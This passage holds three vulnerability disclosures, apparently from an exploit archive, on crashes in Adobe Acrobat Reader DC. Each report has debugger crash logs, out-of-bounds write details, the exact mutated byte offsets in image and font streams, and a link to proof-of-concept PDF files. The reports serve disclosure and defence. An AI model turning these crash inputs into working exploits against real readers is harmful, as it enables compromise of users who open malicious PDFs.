AcroRd32!CTJPEGDecoderHasMoreTiles+0x00001a15 f6568a8 AcroRd32!AX_PDXlateToHostEx+0x002e8858 f56ae8d AcroRd32!AX_PDXlateToHostEx+0x001fce3d 10d5da8c AGM!AGMGetVersion+0x00016e3c 10d5e053 AGM!AGMGetVersion+0x00017403 10fffb4c AGM!AGMGetVersion+0x002b8efc 10cd9a32 AGM!AGMInitialize+0x00040c02 10cd75d6 AGM!AGMInitialize+0x0003e7a6 10cd4133 AGM!AGMInitialize+0x0003b303 10cd2370 AGM!AGMInitialize+0x00039540 10cd0dec AGM!AGMInitialize+0x00037fbc 10cfffbf AGM!AGMInitialize+0x0006718f --- cut --- Notes: - Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with the PageHeap option enabled in Application Verifier. - The crash occurs immediately after opening the PDF document. - Attached samples: poc.pdf (crashing file), original.pdf (original file). - We have minimized the difference between the original and mutated files down to a single byte at offset 0x172b4, which appears to reside inside a binary JP2 image stream. It was modified from 0x1C to 0xFF. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47279.zip

We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- (188c.47fc): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=10868d40 ebx=00001acb ecx=00001aca edx=1086cd54 esi=1086d4d8 edi=1086cd20 eip=1065d2a0 esp=19d5db40 ebp=19d5db70 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 CoolType!CTCleanup+0x22e92: 1065d2a0 89048e mov dword ptr [esi+ecx*4],eax ds:002b:10874000=00000000 0:023> !address esi [...] Usage: Image Base Address: 10867000 End Address: 10874000 Region Size: 0000d000 ( 52.000 kB) State: 00001000 MEM_COMMIT Protect: 00000004 PAGE_READWRITE Type: 01000000 MEM_IMAGE Allocation Base: 105c0000 Allocation Protect: 00000080 PAGE_EXECUTE_WRITECOPY Image Path: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\CoolType.dll Module Name: CoolType Loaded Image Name: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\CoolType.dll Mapped Image Name: More info: lmv m CoolType More info: !lmi CoolType More info: ln 0x1086d4d8 More info: !dh 0x105c0000 0:023> kb # ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00 19d5db70 1065d214 1086cd20 1086d4d8 00000f5c CoolType!CTCleanup+0x22e92 01 19d5dbac 1065dabd 1086d4a0 0000000e 1086d4d8 CoolType!CTCleanup+0x22e06 02 19d5dbec 10668219 18187fb8 1086cca0 10868e60 CoolType!CTCleanup+0x236af 03 19d5dc20 10608e68 18187bb8 19d5e69c 00000f5c CoolType!CTCleanup+0x2de0b 04 19d5e344 10604051 18187bb8 19d5e5d4 19d5e754 CoolType!CTInit+0x460e1 05 19d5e428 1063e7bb 18187bb8 19d5e5d4 19d5e754 CoolType!CTInit+0x412ca 06 19d5e580 1063e47f 18187bb8 19d5e754 19d5e724 CoolType!CTCleanup+0x43ad 07 19d5e5fc 106169cd 18187bb8 108700a0 19d5e754 CoolType!CTCleanup+0x4071 08 19d5e7c4 1061619f 19d5e9b4 00000000 10870350 CoolType!CTInit+0x53c46 09 19d5e894 10615091 00000000 00000001 00000001 CoolType!CTInit+0x53418 0a 19d5ec5c 10614728 0000000c 16589e94 0000e94c CoolType!CTInit+0x5230a 0b 19d5ec9c 10613751 16589de8 0000000b 19d5ed2c CoolType!CTInit+0x519a1 0c 19d5ee08 106132e4 19d5f220 19d5f59c 0000044a CoolType!CTInit+0x509ca 0d 19d5ee5c 64552182 165486c4 19d5f220 19d5f59c CoolType!CTInit+0x5055d 0e 19d5f1a4 64550fc8 207ecb1c 19d5f220 19d5f59c AGM!AGMInitialize+0x69352 0f 19d5f304 6451bcd0 19d5f36c 207ecab8 19d5f634 AGM!AGMInitialize+0x68198 10 19d5f3a0 64523f0a 19d5f584 207ecab8 19d5f634 AGM!AGMInitialize+0x32ea0 11 19d5f5cc 64522370 1730d0d0 14293a90 207ecab8 AGM!AGMInitialize+0x3b0da 12 19d5f7a8 64520dec 1730d0d0 14293a90 e0be67fc AGM!AGMInitialize+0x39540 13 19d5f7f4 6454ffbf 1730d0d0 14293a90 207b2388 AGM!AGMInitialize+0x37fbc 14 19d5f818 6454fa3e 00000004 6454fb7f 14293a90 AGM!AGMInitialize+0x6718f 15 00000000 00000000 00000000 00000000 00000000 AGM!AGMInitialize+0x66c0e --- cut --- Notes: - Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled. - The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data outside of a static buffer in the CoolType.dll library. - Attached samples: poc.pdf (crashing file), original.pdf (original file). - We have minimized the difference between the original and mutated files down to two bytes at offset 0x123bff, changed from the original values of 0xC0 0x95 to 0xFF 0x7F. These bytes reside inside of a CFF font stream. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47273.zip

We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- (50a8.4100): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=ff3a0000 ebx=00003f11 ecx=00002000 edx=00000001 esi=0077bdfc edi=8c9e5000 eip=64b40fb5 esp=0077bdc0 ebp=0077be18 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 CoolType!CTCleanup+0x26ba7: 64b40fb5 894704 mov dword ptr [edi+4],eax ds:002b:8c9e5004=???????? 0:000> kb # ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00 0077be18 64b05405 64d48440 8605cdcc 00000001 CoolType!CTCleanup+0x26ba7 01 0077be34 64b04548 64d48284 27618cb0 0077c5e8 CoolType!CTInit+0x6267e 02 0077be44 64b10fa7 0077be94 64d50130 0077be88 CoolType!CTInit+0x617c1 03 0077c5e8 64b107bf 8605cdcc 0077c60c 0077c6a8 CoolType!CTInit+0x6e220 04 0077c6a0 64b10736 8d3a8ff8 0077c6ec 8c3ccfa8 CoolType!CTInit+0x6da38 05 0077c6b4 64b106c3 8605cd70 0077c6ec 8c3ccfa8 CoolType!CTInit+0x6d9af 06 0077c6c8 64b1051c 8605cd70 0077c6ec 8c3ccfa8 CoolType!CTInit+0x6d93c 07 0077c70c 64b10398 0077c7ec 5f8bc1ec 0077c7b0 CoolType!CTInit+0x6d795 08 0077c738 64b1032b 0077c7ec 5f8bc1b4 0077c7b0 CoolType!CTInit+0x6d611 09 0077c760 64b10208 8c3c8ff0 0077c7ec 5f8bc144 CoolType!CTInit+0x6d5a4 0a 0077c790 64adb3c0 8c3c8ff0 0077c7ec 5f8bcf58 CoolType!CTInit+0x6d481 0b 0077c98c 64ac036d 8605cd70 0077c9c4 5f8bcf3c CoolType!CTInit+0x38639 0c 0077c9e8 64ac1c20 64d31918 00000001 00000000 CoolType!CTInit+0x1d5e6 0d 0077ca18 64ac5eff 8605cd70 64d31918 00000001 CoolType!CTInit+0x1ee99 0e 0077ca54 64ac036d 8605cd70 0077ca8c 5f8bcc64 CoolType!CTInit+0x23178 0f 0077cab0 64ac1c20 64d319d0 00000001 00000000 CoolType!CTInit+0x1d5e6 10 0077cae0 64ac2229 8605cd70 64d319d0 00000001 CoolType!CTInit+0x1ee99 11 0077cb14 64ac5c4d 64d319d0 92280fc8 00000004 CoolType!CTInit+0x1f4a2 12 0077cb4c 64ac32ba 8ce40fc0 5f8bd684 0077d138 CoolType!CTInit+0x22ec6 13 0077d050 64ac31b3 8605cd70 8ce40fc0 0077d0b0 CoolType!CTInit+0x20533 14 0077d088 64ac2ef7 8605cd70 8ce40fc0 0077d0b0 CoolType!CTInit+0x2042c 15 0077d0cc 64ac2d85 0077d1a0 00000000 8605cd00 CoolType!CTInit+0x20170 16 0077d10c 64acdad7 0077d1a0 8ce40fc0 00000000 CoolType!CTInit+0x1fffe 17 0077d168 64acd96f 0077d1a0 8ce40fc0 91bbb002 CoolType!CTInit+0x2ad50 18 0077d1b8 123bf455 8cae2f08 64d32280 91bbb002 CoolType!CTInit+0x2abe8 19 0077d1dc 123be4e2 91bbb002 00000007 00000000 AcroRd32!DllCanUnloadNow+0x176495 1a 0077e544 123ba692 0077e690 8b972f68 00000004 AcroRd32!DllCanUnloadNow+0x175522 1b 0077e72c 123ba2fe 0077e740 91b7ea98 00000000 AcroRd32!DllCanUnloadNow+0x1716d2 1c 0077e780 123b655c 0077e810 8b972f68 00000000 AcroRd32!DllCanUnloadNow+0x17133e 1d 0077e838 123a93ed b7e1e317 78d62f78 00000000 AcroRd32!DllCanUnloadNow+0x16d59c 1e 0077e918 123a81e8 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d 1f 0077e964 1239b383 78d62f78 00000000 00000000 AcroRd32!DllCanUnloadNow+0x15f228 20 0077ead8 1239ac97 9096fdbc 00000001 870c2ef8 AcroRd32!DllCanUnloadNow+0x1523c3 21 0077eb40 12398590 b7e1e1cf 96476e74 870c2ef8 AcroRd32!DllCanUnloadNow+0x151cd7 22 0077ebc0 1239825a 870c2ef8 8de26f40 96476e44 AcroRd32!DllCanUnloadNow+0x14f5d0 23 0077ebfc 12416099 870c2ef8 8de26f40 96476e44 AcroRd32!DllCanUnloadNow+0x14f29a 24 0077ecd4 124157f9 8ae88fc8 00000000 8de26f40 AcroRd32!CTJPEGDecoderRelease+0x2b209 25 0077ed14 12415717 8ae88fc8 00000000 8de26f40 AcroRd32!CTJPEGDecoderRelease+0x2a969 26 0077ed4c 12415669 00000000 8de26f40 0077eecc AcroRd32!CTJPEGDecoderRelease+0x2a887 27 0077ed68 124151ec 8de26f40 0077eecc 0077eee4 AcroRd32!CTJPEGDecoderRelease+0x2a7d9 28 0077ef30 12414a8c 00000009 00000000 ffffffff AcroRd32!CTJPEGDecoderRelease+0x2a35c 29 0077f150 124147d4 124147a0 8991cf90 0077f1a8 AcroRd32!CTJPEGDecoderRelease+0x29bfc 2a 0077f160 1226ed79 8d2061b8 b7e1fba7 8b612ff8 AcroRd32!CTJPEGDecoderRelease+0x29944 2b 0077f1a8 1226e83d 00000744 b7e1f817 15861fd8 AcroRd32!DllCanUnloadNow+0x25db9 2c 0077f218 1226e5d4 b7e1f84f 15861fd8 1226e560 AcroRd32!DllCanUnloadNow+0x2587d 2d 0077f240 12204709 000004d3 00000000 12204270 AcroRd32!DllCanUnloadNow+0x25614 2e 0077f25c 7460e0bb 00bc0f52 00000113 000004d3 AcroRd32!AcroWinMainSandbox+0x8909 2f 0077f288 74618849 12204270 00bc0f52 00000113 USER32!_InternalCallWinProc+0x2b 30 0077f2ac 7461b145 00000113 000004d3 00000000 USER32!InternalCallWinProc+0x20 31 0077f37c 746090dc 12204270 00000000 00000113 USER32!UserCallWinProcCheckWow+0x1be 32 0077f3e8 74608c20 1a382cee 0077f40c 1226da8b USER32!DispatchMessageWorker+0x4ac 33 0077f3f4 1226da8b 0077f428 1583ddd8 1583ddd8 USER32!DispatchMessageW+0x10 34 0077f40c 1226d81e 0077f428 b7e1fe8f 1583ddd8 AcroRd32!DllCanUnloadNow+0x24acb 35 0077f480 1226d6b4 b7e1feb7 1583ddd8 00000000 AcroRd32!DllCanUnloadNow+0x2485e 36 0077f4b8 121fc556 b7e1ff27 1458cff8 00000000 AcroRd32!DllCanUnloadNow+0x246f4 37 0077f528 121fbf81 121d0000 00af0000 1458cff8 AcroRd32!AcroWinMainSandbox+0x756 38 0077f948 00af783d 121d0000 00af0000 1458cff8 AcroRd32!AcroWinMainSandbox+0x181 39 0077fd14 00bffd2a 00af0000 00000000 0b6db3ba AcroRd32_exe+0x783d 3a 0077fd60 73cf8674 0041d000 73cf8650 be42f918 AcroRd32_exe!AcroRd32IsBrokerProcess+0x9940a 3b 0077fd74 77285e17 0041d000 11e63d34 00000000 KERNEL32!BaseThreadInitThunk+0x24 3c 0077fdbc 77285de7 ffffffff 772aadae 00000000 ntdll!__RtlUserThreadStart+0x2f 3d 0077fdcc 00000000 00af1390 0041d000 00000000 ntdll!_RtlUserThreadStart+0x1b --- cut --- Notes: - Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled (more consistently with PageHeap, though). - The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data outside of an allocated buffer. - It seems to be an off-by-one error, leading to an 8-byte overflow. - Attached samples: poc.pdf (crashing file), original.pdf (original file). - We have minimized the difference between the original and mutated files down to two bytes at offsets 0x3f523 and 0x40123 (0x65 => 0x75 and 0x15 => 0x05). These bytes reside inside of a Type 1 font stream. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47274.zip